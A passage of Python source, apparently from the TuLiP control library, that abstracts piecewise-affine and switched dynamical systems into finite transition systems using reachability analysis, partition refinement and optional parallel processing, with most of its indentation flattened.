new_idx = range(n_cells-1, n_cells-num_new-1, -1)
"""Update transition matrix"""
transitions = np.pad(transitions, (0,num_new), 'constant')
transitions[i, :] = np.zeros(n_cells)
for r in new_idx:
#transitions[:, r] = transitions[:, i]
# All sets reachable from start are reachable from both part's
# except possibly the new part
transitions[i, r] = 0
transitions[j, r] = 0
# sol[j] is reachable from intersection of sol[i] and S0
if i != j:
transitions[j, i] = 1
            # sol[j] is reachable from each piece of S0 \cap sol[i]
#for k in range(n_cells-n_isect-2, n_cells):
# transitions[j, k] = 1
"""Update adjacency matrix"""
old_adj = np.nonzero(adj[i, :])[0]
# reset new adjacencies
adj[i, :] = np.zeros([n_cells -num_new])
adj[:, i] = np.zeros([n_cells -num_new])
adj[i, i] = 1
adj = np.pad(adj, (0, num_new), 'constant')
for r in new_idx:
adj[i, r] = 1
adj[r, i] = 1
adj[r, r] = 1
if not conservative:
orig = np.hstack([orig, orig[i]])
# adjacencies between pieces of isect and diff
for r in new_idx:
for k in new_idx:
if r is k:
continue
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
msg = ''
if logger.getEffectiveLevel() <= logging.DEBUG:
msg += '\t\n Adding states {i} and '.format(i=i)
for r in new_idx:
msg += '{r} and '.format(r=r)
msg += '\n'
logger.debug(msg)
for k in np.setdiff1d(old_adj, [i,n_cells-1]):
# Every "old" neighbor must be the neighbor
# of at least one of the new
if pc.is_adjacent(sol[i], sol[k]):
adj[i, k] = 1
adj[k, i] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[i, k] = 0
transitions[k, i] = 0
for r in new_idx:
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[r, k] = 0
transitions[k, r] = 0
"""Update IJ matrix"""
IJ = np.pad(IJ, (0,num_new), 'constant')
adj_k = reachable_within(trans_length, adj, adj)
sym_adj_change(IJ, adj_k, transitions, i)
for r in new_idx:
sym_adj_change(IJ, adj_k, transitions, r)
if logger.getEffectiveLevel() <= logging.DEBUG:
msg = '\n\n Updated adj: \n{adj}'.format(adj=adj)
msg += '\n\n Updated trans: \n{trans}'.format(trans=
transitions)
msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ)
logger.debug(msg)
logger.info('Divided region: {i}\n'.format(i=i))
elif vol2 < abs_tol:
logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j))
transitions[j,i] = 1
else:
if logger.level <= logging.DEBUG:
msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j)
msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2)
msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1)
logger.debug(msg)
else:
logger.info('\t unreachable\n')
transitions[j,i] = 0
# check to avoid overlapping Regions
if debug:
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
assert(tmp_part.is_partition() )
n_cells = len(sol)
progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2
progress += [progress_ratio]
msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells)
msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio)
logger.info(msg)
iter_count += 1
# no plotting ?
if not plotit:
continue
if plt is None or plot_partition is None:
continue
if iter_count % plot_every != 0:
continue
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# plot pair under reachability check
ax2.clear()
si_tmp.plot(ax=ax2, color='green')
sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5)
plot_transition_arrow(si_tmp, sj_tmp, ax2)
S0.plot(ax2, color='none', hatch='/', alpha=0.3)
fig.canvas.draw()
# plot partition
ax1.clear()
plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23)
# plot dynamics
ssys.plot(ax1, show_domain=False)
# plot hatched continuous propositions
part.plot_props(ax1)
fig.canvas.draw()
# scale view based on domain,
# not only the current polytopes si, sj
l,u = part.domain.bounding_box
ax2.set_xlim(l[0,0], u[0,0])
ax2.set_ylim(l[1,0], u[1,0])
if save_img:
fname = 'movie' +str(iter_count).zfill(3)
fname += '.' + file_extension
fig.savefig(fname, dpi=250)
plt.pause(1)
new_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# check completeness of adjacency matrix
if debug:
tmp_part = deepcopy(new_part)
tmp_part.compute_adj()
# Generate transition system and add transitions
ofts = trs.FTS()
adj = sp.lil_matrix(transitions.T)
n = adj.shape[0]
ofts_states = range(n)
ofts.states.add_from(ofts_states)
ofts.transitions.add_adj(adj, ofts_states)
# Decorate TS with state labels
atomic_propositions = set(part.prop_regions)
ofts.atomic_propositions.add_from(atomic_propositions)
for state, region in zip(ofts_states, sol):
state_prop = region.props.copy()
ofts.states.add(state, ap=state_prop)
param = {
'N':N,
'trans_length':trans_length,
'closed_loop':closed_loop,
'conservative':conservative,
'use_all_horizon':use_all_horizon,
'min_cell_volume':min_cell_volume,
'max_num_poly':max_num_poly
}
ppp2orig = [part2orig[x] for x in orig]
end_time = os.times()[0]
msg = 'Total abstraction time: {time}[sec]'.format(time=
end_time - start_time)
print(msg)
logger.info(msg)
if save_img and plt is not None:
fig, ax = plt.subplots(1, 1)
plt.plot(progress)
ax.set_xlabel('iteration')
ax.set_ylabel('progress ratio')
ax.figure.savefig('progress.pdf')
return AbstractPwa(
ppp=new_part,
ts=ofts,
ppp2ts=ofts_states,
pwa=ssys,
pwa_ppp=part,
ppp2pwa=orig,
ppp2sys=subsys_list,
orig_ppp=orig_ppp,
ppp2orig=ppp2orig,
disc_params=param
)
def _discretize_dual(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1
):
"""Refine the partition and establish transitions
based on reachability analysis. Use dual-simulation algorithm.
Reference
=========
1. U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
2. Wagenmaker, A. J.; Ozay, N.
"A Bisimulation-like Algorithm for Abstracting Control Systems."
54th Annual Allerton Conference on CCC 2016
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@rtype: L{AbstractPwa}
"""
start_time = os.times()[0]
orig_ppp = part
min_cell_volume = (min_cell_volume /np.finfo(np.double).eps
*np.finfo(np.double).eps)
ispwa = isinstance(ssys, PwaSysDyn)
islti = isinstance(ssys, LtiSysDyn)
if ispwa:
(part, ppp2pwa, part2orig) = pwa_partition(ssys, part)
else:
part2orig = range(len(part))
# Save original polytopes, require them to be convex
if conservative:
orig_list = None
orig = [0]
else:
(part, new2old) = part2convex(part) # convexify
part2orig = [part2orig[i] for i in new2old]
# map new regions to pwa subsystems
if ispwa:
ppp2pwa = [ppp2pwa[i] for i in new2old]
remove_trans = False # already allowed in nonconservative
orig_list = []
for poly in part:
if len(poly) == 0:
orig_list.append(poly.copy())
elif len(poly) == 1:
orig_list.append(poly[0].copy())
else:
raise Exception("discretize: "
"problem in convexification")
orig = list(range(len(orig_list)))
# Cheby radius of disturbance set
# (defined within the loop for pwa systems)
if islti:
if len(ssys.E) > 0:
rd = ssys.Wset.chebR
else:
rd = 0.
# Initialize matrix for pairs to check
IJ = part.adj.copy().toarray()
logger.debug("\n Starting IJ: \n" + str(IJ) )
# next line omitted in discretize_overlap
IJ = reachable_within(trans_length, IJ,
part.adj.toarray())
# Initialize output
num_regions = len(part)
transitions = np.zeros(
[num_regions, num_regions],
dtype = int
)
sol = deepcopy(part.regions)
adj = part.adj.copy().toarray()
# next 2 lines omitted in discretize_overlap
if ispwa:
subsys_list = list(ppp2pwa)
else:
subsys_list = None
ss = ssys
# init graphics
if plotit:
try:
import matplotlib.pyplot as plt
plt.ion()
fig, (ax1, ax2) = plt.subplots(1, 2)
ax1.axis('scaled')
ax2.axis('scaled')
file_extension = 'pdf'
        except Exception:
logger.error('failed to import matplotlib')
plt = None
else:
plt = None
iter_count = 0
# List of how many "new" regions
# have been created for each region
# and a list of original number of neighbors
#num_new_reg = np.zeros(len(orig_list))
#num_orig_neigh = np.sum(adj, axis=1).flatten() - 1
progress = list()
# Do the abstraction
while np.sum(IJ) > 0:
ind = np.nonzero(IJ)
# i,j swapped in discretize_overlap
i = ind[1][0]
j = ind[0][0]
IJ[j, i] = 0
si = sol[i]
sj = sol[j]
si_tmp = deepcopy(si)
sj_tmp = deepcopy(sj)
#num_new_reg[i] += 1
#print(num_new_reg)
if ispwa:
ss = ssys.list_subsys[subsys_list[i]]
if len(ss.E) > 0:
rd, xd = pc.cheby_ball(ss.Wset)
else:
rd = 0.
if conservative:
# Don't use trans_set
trans_set = None
else:
# Use original cell as trans_set
trans_set = orig_list[orig[i]]
S0 = solve_feasible(
si, sj, ss, N, closed_loop,
use_all_horizon, trans_set, max_num_poly
)
msg = '\n Working with partition cells: {i}, {j}'.format(i=i,
j=j)
logger.info(msg)
msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i,
num=len(si))
msg += '\t{j} (#polytopes = {num})\n'.format(j=j,
num=len(sj))
if ispwa:
msg += '\t with active subsystem: '
msg += '{sys}\n'.format(sys=subsys_list[i])
msg += '\t Computed reachable set S0 with volume: '
msg += '{vol}\n'.format(vol=S0.volume)
logger.debug(msg)
#logger.debug(r'si \cap s0')
isect = si.intersect(S0)
vol1 = isect.volume
risect, xi = pc.cheby_ball(isect)
#logger.debug(r'si \ s0')
rsi, xd = pc.cheby_ball(si)
vol2 = si.volume-vol1 # not accurate. need to check polytope class
if vol1 <= min_cell_volume:
logger.warning('\t too small: si \\cap Pre(sj), '
'so discard intersection')
if vol1 <= min_cell_volume and isect:
logger.warning('\t discarded non-empty intersection: '
'consider reducing min_cell_volume')
if vol2 <= min_cell_volume:
logger.warning('\t too small: si \\ Pre(sj), so not reached it')
        # indicate whether S0 already exists in sol
check_isect = False
# We don't want our partitions to be smaller than the disturbance set
# Could be a problem since cheby radius is calculated for smallest
# convex polytope, so if we have a region we might throw away a good
# cell.
if (
vol1 > min_cell_volume and
risect > rd and
vol2 > min_cell_volume and
rsi > rd):
# check if the intersection has existed in current partitions
for idx in range(len(sol)):
if(sol[idx] == isect):
logger.info('Found: {idx} ---> {j} '.format(idx=idx,
j=j))
logger.info('intersection exists.\n')
transitions[j, idx] = 1
check_isect = True
if not check_isect:
# Make sure new areas are Regions and add proposition lists
if len(isect) == 0:
isect = pc.Region([isect], si.props)
else:
isect.props = si.props.copy()
# add intersection in sol
isect_list = pc.separate(isect)
sol.append(isect_list[0])
n_cells = len(sol)
new_idx = n_cells-1
"""Update adjacency matrix"""
old_adj = np.nonzero(adj[i, :])[0]
adj = np.pad(adj, (0, 1), 'constant')
# cell i and new_idx are adjacent
adj[i, new_idx] = 1
adj[new_idx, i] = 1
adj[new_idx, new_idx] = 1
if not conservative:
orig = np.hstack([orig, orig[i]])
msg = ''
if logger.getEffectiveLevel() <= logging.DEBUG:
msg += '\t\n Adding states {new_idx}\n'.format(new_idx=
new_idx)
logger.debug(msg)
for k in np.setdiff1d(old_adj, [i,n_cells-1]):
# Every "old" neighbor must be the neighbor
# of at least one of the new
if pc.is_adjacent(sol[new_idx], sol[k]):
adj[new_idx, k] = 1
adj[k, new_idx] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[new_idx, k] = 0
transitions[k, new_idx] = 0
"""Update transition matrix"""
transitions = np.pad(transitions, (0,1), 'constant')
adj_k = reachable_within(trans_length, adj, adj)
# transitions i ---> k for k is neighbor of new_idx should be
# kept by new_idx
transitions[:, new_idx] = np.multiply(transitions[:, i],
adj_k[:, i])
# if j and new_idx are neighbor, then add new_idx ---> j
if adj_k[j, new_idx] != 0:
transitions[j, new_idx] = 1
"""Update IJ matrix"""
IJ = np.pad(IJ, (0, 1), 'constant')
sym_adj_change(IJ, adj_k, transitions, i)
sym_adj_change(IJ, adj_k, transitions, new_idx)
if logger.getEffectiveLevel() <= logging.DEBUG:
msg = '\n\n Updated adj: \n{adj}'.format(adj=adj)
msg += '\n\n Updated trans: \n{trans}'.format(trans=
transitions)
msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ)
logger.debug(msg)
logger.info('Divided region: {i}\n'.format(i=i))
elif vol2 < abs_tol:
logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j))
transitions[j, i] = 1
else:
if logger.level <= logging.DEBUG:
msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j)
msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2)
msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1)
logger.debug(msg)
else:
logger.info('\t unreachable\n')
transitions[j, i] = 0
# check to avoid overlapping Regions
if debug:
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
assert(tmp_part.is_partition() )
n_cells = len(sol)
progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2
progress += [progress_ratio]
msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells)
msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio)
logger.info(msg)
iter_count += 1
# needs to be removed later
# if(iter_count>=700):
# break
# no plotting ?
if not plotit:
continue
if plt is None or plot_partition is None:
continue
if iter_count % plot_every != 0:
continue
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# plot pair under reachability check
ax2.clear()
si_tmp.plot(ax=ax2, color='green')
sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5)
plot_transition_arrow(si_tmp, sj_tmp, ax2)
S0.plot(ax2, color='none', hatch='/', alpha=0.3)
fig.canvas.draw()
# plot partition
ax1.clear()
plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23)
# plot dynamics
ssys.plot(ax1, show_domain=False)
# plot hatched continuous propositions
part.plot_props(ax1)
fig.canvas.draw()
# scale view based on domain,
# not only the current polytopes si, sj
l,u = part.domain.bounding_box
ax2.set_xlim(l[0,0], u[0,0])
ax2.set_ylim(l[1,0], u[1,0])
if save_img:
fname = 'movie' +str(iter_count).zfill(3)
fname += '.' + file_extension
fig.savefig(fname, dpi=250)
plt.pause(1)
new_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# check completeness of adjacency matrix
if debug:
tmp_part = deepcopy(new_part)
tmp_part.compute_adj()
# Generate transition system and add transitions
ofts = trs.FTS()
adj = sp.lil_matrix(transitions.T)
n = adj.shape[0]
ofts_states = range(n)
ofts.states.add_from(ofts_states)
ofts.transitions.add_adj(adj, ofts_states)
# Decorate TS with state labels
atomic_propositions = set(part.prop_regions)
ofts.atomic_propositions.add_from(atomic_propositions)
for state, region in zip(ofts_states, sol):
state_prop = region.props.copy()
ofts.states.add(state, ap=state_prop)
param = {
'N':N,
'trans_length':trans_length,
'closed_loop':closed_loop,
'conservative':conservative,
'use_all_horizon':use_all_horizon,
'min_cell_volume':min_cell_volume,
'max_num_poly':max_num_poly
}
ppp2orig = [part2orig[x] for x in orig]
end_time = os.times()[0]
msg = 'Total abstraction time: {t} [sec]'.format(
t=end_time - start_time)
print(msg)
logger.info(msg)
if save_img and plt is not None:
fig, ax = plt.subplots(1, 1)
plt.plot(progress)
ax.set_xlabel('iteration')
ax.set_ylabel('progress ratio')
ax.figure.savefig('progress.pdf')
return AbstractPwa(
ppp=new_part,
ts=ofts,
ppp2ts=ofts_states,
pwa=ssys,
pwa_ppp=part,
ppp2pwa=orig,
ppp2sys=subsys_list,
orig_ppp=orig_ppp,
ppp2orig=ppp2orig,
disc_params=param
)
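# reachable_within() generalizes the adjacency matrix to multi-hop
# reachability: starting from adj_k, it repeatedly multiplies by adj and
# thresholds to booleans, so with adj_k == adj (ones on the diagonal) the
# result marks pairs of regions reachable within trans_length adjacency hops.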
def reachable_within(trans_length, adj_k, adj):
"""Find cells reachable within trans_length hops.
"""
if trans_length <= 1:
return adj_k
k = 1
while k < trans_length:
adj_k = (np.dot(adj_k, adj)!=0).astype(int)
k += 1
adj_k = (adj_k > 0).astype(int)
return adj_k
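# sym_adj_change() refreshes row and column i of the pair-checking matrix IJ:
# a pair is re-queued for reachability analysis whenever it is adjacent
# (within trans_length hops, via adj_k) but no transition has been found yet.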
def sym_adj_change(IJ, adj_k, transitions, i):
horizontal = adj_k[i, :] -transitions[i, :] > 0
vertical = adj_k[:, i] -transitions[:, i] > 0
IJ[i, :] = horizontal.astype(int)
IJ[:, i] = vertical.astype(int)
# DEFUNCT until further notice
def discretize_overlap(closed_loop=False, conservative=False):
"""default False.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
#
# if rdiff < abs_tol:
# logger.info("Transition found")
# transitions[i,j] = 1
#
# elif ((vol1 > min_cell_volume) & (risect > rd) &
# (num_new_reg[i] <= num_orig_neigh[i]+1)):
#
# # Make sure new cell is Region and add proposition lists
# if len(isect) == 0:
# isect = pc.Region([isect], si.props)
# else:
# isect.props = si.props.copy()
#
# # Add new state
# sol.append(isect)
# size = len(sol)
#
# # Add transitions
# transitions = np.hstack([transitions, np.zeros([size - 1, 1],
# dtype=int) ])
# transitions = np.vstack([transitions, np.zeros([1, size],
# dtype=int) ])
#
# # All sets reachable from orig cell are reachable from both cells
# transitions[size-1,:] = transitions[i,:]
# transitions[size-1,j] = 1 # j is reachable from new cell
#
# # Take care of adjacency
# old_adj = np.nonzero(adj[i,:])[0]
#
# adj = np.hstack([adj, np.zeros([size - 1, 1], dtype=int) ])
# adj = np.vstack([adj, np.zeros([1, size], dtype=int) ])
# adj[i,size-1] = 1
# adj[size-1,i] = 1
# adj[size-1,size-1] = 1
#
# for k in np.setdiff1d(old_adj,[i,size-1]):
# if pc.is_adjacent(sol[size-1],sol[k],overlap=True):
# adj[size-1,k] = 1
# adj[k, size-1] = 1
# else:
# # Actively remove (valid) transitions between non-neighbors
# transitions[size-1,k] = 0
# transitions[k,size-1] = 0
#
# # Assign original proposition cell to new state and update counts
# if not conservative:
# orig = np.hstack([orig, orig[i]])
# print(num_new_reg)
# num_new_reg = np.hstack([num_new_reg, 0])
# num_orig_neigh = np.hstack([num_orig_neigh, np.sum(adj[size-1,:])-1])
#
# logger.info("\n Adding state " + str(size-1) + "\n")
#
# # Just add adjacent cells for checking,
# # unless transition already found
# IJ = np.hstack([IJ, np.zeros([size - 1, 1], dtype=int) ])
# IJ = np.vstack([IJ, np.zeros([1, size], dtype=int) ])
# horiz2 = adj[size-1,:] - transitions[size-1,:] > 0
# verti2 = adj[:,size-1] - transitions[:,size-1] > 0
# IJ[size-1,:] = horiz2.astype(int)
# IJ[:,size-1] = verti2.astype(int)
# else:
# logger.info("No transition found, intersect vol: " + str(vol1) )
# transitions[i,j] = 0
#
# new_part = PropPreservingPartition(
# domain=part.domain,
# regions=sol, adj=np.array([]),
# trans=transitions, prop_regions=part.prop_regions,
# original_regions=orig_list, orig=orig)
# return new_part
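# Worker entry points for the multiprocessing-based discretization below.
# Each worker swaps the module logger for a multiprocessing-aware one,
# abstracts a single mode (or computes its transitions), and reports the
# result back through the shared queue as a (mode, result) tuple.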
def multiproc_discretize(q, mode, ppp, cont_dyn, disc_params):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
print('Abstracting mode: ' + str(mode) + ', on: ' + str(name))
absys = discretize(ppp, cont_dyn, **disc_params)
q.put((mode, absys))
    print('Worker: ' + str(name) + ' finished.')
def multiproc_get_transitions(
q, absys, mode, ssys, params
):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
    print('Computing transitions on merged partition for mode: ' +
          str(mode) + ', on: ' + str(name))
trans = get_transitions(absys, mode, ssys, **params)
q.put((mode, trans))
    print('Worker: ' + str(name) + ' finished.')
def multiproc_discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Parallel implementation of discretize_switched.
Uses the multiprocessing package.
"""
logger.info('parallel discretize_switched started')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
q = mp.Queue()
mode_args = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
mode_args[mode] = (q, mode, ppp, cont_dyn, disc_params[mode])
jobs = [mp.Process(target=multiproc_discretize, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
    # drain the queue before join(): a child process can block at exit until
    # everything it has put on the queue is consumed, see
    # http://stackoverflow.com/questions/19071529/
abstractions = dict()
for job in jobs:
mode, absys = q.get()
abstractions[mode] = absys
for job in jobs:
job.join()
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
    logger.info('Merged partition has: ' + str(n) + ' states')
# find feasible transitions over merged partition
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
mode_args[mode] = (q, merged_abstr, mode, cont_dyn, params)
jobs = [mp.Process(target=multiproc_get_transitions, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
trans = dict()
for job in jobs:
mode, t = q.get()
trans[mode] = t
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Abstract switched dynamics over given partition.
@type ppp: L{PropPreservingPartition}
@param hybrid_sys: dynamics of switching modes
@type hybrid_sys: L{SwitchedSysDyn}
@param disc_params: discretization parameters passed to L{discretize} for
each mode. See L{discretize} for details.
@type disc_params: dict (keyed by mode) of dicts.
@param plot: save partition images
@type plot: bool
@param show_ts, only_adjacent: options for L{AbstractPwa.plot}.
@return: abstracted dynamics,
some attributes are dict keyed by mode
@rtype: L{AbstractSwitched}
"""
    if disc_params is None:
        # default parameters, keyed by mode as expected below
        disc_params = {
            mode: {'N': 1, 'trans_length': 1}
            for mode in hybrid_sys.modes}
logger.info('discretizing hybrid system')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
# discretize each abstraction separately
abstractions = dict()
for mode in modes:
logger.debug(30*'-'+'\n')
logger.info('Abstracting mode: ' + str(mode))
cont_dyn = hybrid_sys.dynamics[mode]
absys = discretize(
ppp, cont_dyn,
**disc_params[mode]
)
logger.debug('Mode Abstraction:\n' + str(absys) +'\n')
abstractions[mode] = absys
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
    logger.info('Merged partition has ' + str(n) + ' states')
# find feasible transitions over merged partition
trans = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
trans[mode] = get_transitions(
merged_abstr, mode, cont_dyn,
N=params['N'], trans_length=params['trans_length']
)
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
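# --- Added illustrative sketch (not part of the original module) ----------
# A minimal example of how discretize_switched() above might be driven,
# assuming `ppp` is a PropPreservingPartition and `hybrid_sys` is a
# SwitchedSysDyn whose .modes and .dynamics are already populated (both
# constructed elsewhere); the parameter values here are arbitrary.
def _example_discretize_switched(ppp, hybrid_sys):
    # one discretization-parameter dict per mode, using the keys read above
    disc_params = {mode: {'N': 8, 'trans_length': 2}
                   for mode in hybrid_sys.modes}
    merged = discretize_switched(ppp, hybrid_sys, disc_params=disc_params)
    # merged.ts is the common finite transition system over the merged
    # partition; merged.ppp2ts maps partition cells to its states
    return merged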
def plot_mode_partitions(swab, show_ts, only_adjacent):
"""Save each mode's partition and final merged partition.
"""
axs = swab.plot(show_ts, only_adjacent)
if not axs:
logger.error('failed to plot the partitions.')
return
n = len(swab.modes)
assert(len(axs) == 2*n)
# annotate
for ax in axs:
plot_annot(ax)
    # save merged partition (one figure per mode, showing its transitions)
    for ax, mode in zip(axs[:n], swab.modes):
        fname = 'merged_' + str(mode) + '.pdf'
        ax.figure.savefig(fname)
    # save each mode's own partition
    for ax, mode in zip(axs[n:], swab.modes):
        fname = 'part_' + str(mode) + '.pdf'
        ax.figure.savefig(fname)
def plot_annot(ax):
fontsize = 5
for tick in ax.xaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
for tick in ax.yaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
ax.set_xlabel('$v_1$', fontsize=fontsize+6)
ax.set_ylabel('$v_2$', fontsize=fontsize+6)
def merge_abstractions(merged_abstr, trans, abstr, modes, mode_nums):
"""Construct merged transitions.
@type merged_abstr: L{AbstractSwitched}
@type abstr: dict of L{AbstractPwa}
"""
# TODO: check equality of atomic proposition sets
aps = abstr[modes[0]].ts.atomic_propositions
logger.info('APs: ' + str(aps))
sys_ts = trs.FTS()
    # create states
n = len(merged_abstr.ppp)
states = range(n)
sys_ts.states.add_from(states)
sys_ts.atomic_propositions.add_from(aps)
# copy AP labels from regions to discrete states
ppp2ts = states
for (i, state) in enumerate(ppp2ts):
props = merged_abstr.ppp[i].props
sys_ts.states[state]['ap'] = props
# create mode actions
sys_actions = [str(s) for e,s in modes]
env_actions = [str(e) for e,s in modes]
# no env actions ?
if mode_nums[0] == 0:
actions_per_mode = {
(e,s):{'sys_actions':str(s)}
for e,s in modes
}
sys_ts.sys_actions.add_from(sys_actions)
elif mode_nums[1] == 0:
# no sys actions
actions_per_mode = {
(e,s):{'env_actions':str(e)}
for e,s in modes
}
sys_ts.env_actions.add_from(env_actions)
else:
actions_per_mode = {
(e,s):{'env_actions':str(e), 'sys_actions':str(s)}
for e,s in modes
}
sys_ts.env_actions.add_from([str(e) for e,s in modes])
sys_ts.sys_actions.add_from([str(s) for e,s in modes])
for mode in modes:
env_sys_actions = actions_per_mode[mode]
adj = trans[mode]
sys_ts.transitions.add_adj(
adj = adj,
adj2states = states,
**env_sys_actions
)
merged_abstr.ts = sys_ts
merged_abstr.ppp2ts = ppp2ts
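# Added note: merge_abstractions() leaves `merged_abstr.ts` with one state per
# merged partition cell (see `ppp2ts` above) and one transition relation per
# mode, each labeled with that mode's env/sys actions.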
def get_transitions(
abstract_sys, mode, ssys, N=10,
closed_loop=True,
trans_length=1
):
"""Find which transitions are feasible in given mode.
Used for the candidate transitions of the merged partition.
@rtype: scipy.sparse.lil_matrix
"""
logger.info('checking which transitions remain feasible after merging')
part = abstract_sys.ppp
# Initialize matrix for pairs to check
IJ = part.adj.copy()
if trans_length > 1:
k = 1
while k < trans_length:
IJ = np.dot(IJ, part.adj)
k += 1
IJ = (IJ > 0).astype(int)
# Initialize output
n = len(part)
transitions = sp.lil_matrix((n, n), dtype=int)
# Do the abstraction
n_checked = 0
n_found = 0
while np.sum(IJ) > 0:
n_checked += 1
ind = np.nonzero(IJ)
i = ind[1][0]
j = ind[0][0]
IJ[j,i] = 0
logger.debug('checking transition: ' + str(i) + ' -> ' + str(j))
si = part[i]
sj = part[j]
# Use original cell as trans_set
trans_set = abstract_sys.ppp2pwa(mode, i)[1]
active_subsystem = abstract_sys.ppp2sys(mode, i)[1]
trans_feasible = is_feasible(
si, sj, active_subsystem, N,
closed_loop = closed_loop,
trans_set = trans_set
)
if trans_feasible:
transitions[i, j] = 1
msg = '\t Feasible transition.'
n_found += 1
else:
transitions[i, j] = 0
            msg = '\t Transition not feasible.'
logger.debug(msg)
logger.info('Checked: ' + str(n_checked))
logger.info('Found: ' + str(n_found))
    assert n_checked != 0, 'would divide by zero below'
    logger.info('Survived merging: ' + str(100.0 * n_found / n_checked) + ' %')
return transitions
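# --- Added illustrative sketch (not part of the original module) ----------
# How the candidate matrix IJ in get_transitions() grows with trans_length:
# for trans_length = k, candidate pairs are those reachable in at most k
# adjacency hops. Standalone toy example with a 3-cell chain 0 - 1 - 2.
def _example_candidate_pairs():
    import numpy as np
    adj = np.array([[1, 1, 0],
                    [1, 1, 1],
                    [0, 1, 1]], dtype=int)
    IJ = adj.copy()
    trans_length = 2
    k = 1
    while k < trans_length:
        IJ = np.dot(IJ, adj)
        k += 1
    IJ = (IJ > 0).astype(int)
    # with trans_length=2, cells 0 and 2 become candidates even though
    # they are not directly adjacent
    return IJ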
def multiproc_merge_partitions(abstractions):
"""LOGTIME in #processors parallel merging.
Assuming sufficient number of processors.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
def merge_partitions(abstractions):
"""Merge multiple abstractions.
